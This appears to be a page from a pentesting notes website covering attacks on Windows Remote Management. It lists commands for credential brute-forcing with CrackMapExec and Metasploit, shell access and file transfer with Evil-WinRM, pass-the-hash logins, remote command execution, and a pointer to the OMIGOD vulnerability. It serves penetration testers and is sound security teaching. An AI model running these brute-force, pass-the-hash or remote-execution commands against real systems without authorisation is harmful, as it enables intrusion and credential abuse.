# WinRM (Windows Remote Management) Pentesting ### [Enumeration](https://exploit-notes.hdks.org/exploit/windows/protocol/winrm-pentesting/#enumeration) #### [Brute Force Credentials](https://exploit-notes.hdks.org/exploit/windows/protocol/winrm-pentesting/#brute-force-credentials) ```sh # CrackMapExec poetry run crackmapexec winrm -d DomainName -u usernames.txt -p passwords.txt # Metasploit msfconsole msf > use auxiliary/scanner/winrm/winrm_login Copied! ```
### [Evil-WinRM](https://exploit-notes.hdks.org/exploit/windows/protocol/winrm-pentesting/#evil-winrm) [**Evil-WinRM**](https://github.com/Hackplayers/evil-winrm) is a Windows Remote Management shell for pentesting.\ Below are list of commands for each situation. #### [Connect](https://exploit-notes.hdks.org/exploit/windows/protocol/winrm-pentesting/#connect) ```powershell evil-winrm -i -u username -p password # -P: Specifify port evil-winrm -i -P 5986 -u username -p password # Pass The Hash (-H) evil-winrm -i -P 5986 -u username -H 0e0363213e37b94221497260b0bcb4fc # PowerShell Local Path (-s) evil-winrm -i -u username -p password -s /opt/scripts # SSL enabled (-S) evil-winrm -i -u username -p password -S Copied! ``` If you have private key and public key, you can use them for authentication. ```sh # -S: SSL # -k: private key # -c: public key evil-winrm -i -S -k private.key -c public.key Copied! ``` #### [Commands](https://exploit-notes.hdks.org/exploit/windows/protocol/winrm-pentesting/#commands) After connecting, we can use a lot of useful commands to exploit.\ Note that **we need to specify the absolute path for uploading and downloading.** ```powershell # Upload a local file to Windows machine PS> upload ./example.bat c:\\Users\Administrator\Desktop\exploit.bat # Download a file to local PS> download c:\\Users\Administrator\Desktop\example.txt ./example.txt # List all services PS> services Copied! ```
### [CrackMapExec](https://exploit-notes.hdks.org/exploit/windows/protocol/winrm-pentesting/#crackmapexec) [**CrackMapExec**](https://github.com/byt3bl33d3r/CrackMapExec) is a swiss army knife for pentesting networks.\ The official docs says that it's recommended to use it via **Poetry** which is a Python package manager. First off, move to the directory in which the CrackMapExec installed and run **poetry install**. ```sh cd crackmapexec poetry install Copied! ``` Then execute with **poetry run**. ```sh # Login and CMD execution (-x) poetry run crackmapexec winrm -d DomainName -u username -p password -x 'whoami' # Login and PowerShell execution (-X) poetry run crackmapexec winrm -d DomainName -u username -p password -X '$PSVersionTable' # Pass the Hash and CMD execution (-x) poetry run crackmapexec winrm -d DomainName -u username -H -x 'whoami' # Pass the Hash and PowerShell execution (-X) poetry run crackmapexec winrm -d DomainName -u username -H -X '$PSVersionTable' Copied! ```
### [OMIGOD (CVE-2021-38647)](https://exploit-notes.hdks.org/exploit/windows/protocol/winrm-pentesting/#omigod-$cve-2021-38647$) Open Management Infrastructure (OMI) is vulnerable to Remote Code Execution (RCE). There are many PoC available, for instance: * * ### References * **Tools by HDKS** [Fuzzagotchi](https://github.com/hideckies/fuzzagotchi) Automatic web fuzzer. [aut0rec0n](https://github.com/hideckies/aut0rec0n) Auto reconnaissance CLI. [Hash Cracker](https://hash-cracker.hdks.org/) Hash identifier. [Disclaimer](https://exploit-notes.hdks.org/disclaimer)[Privacy Policy](https://exploit-notes.hdks.org/privacy-policy)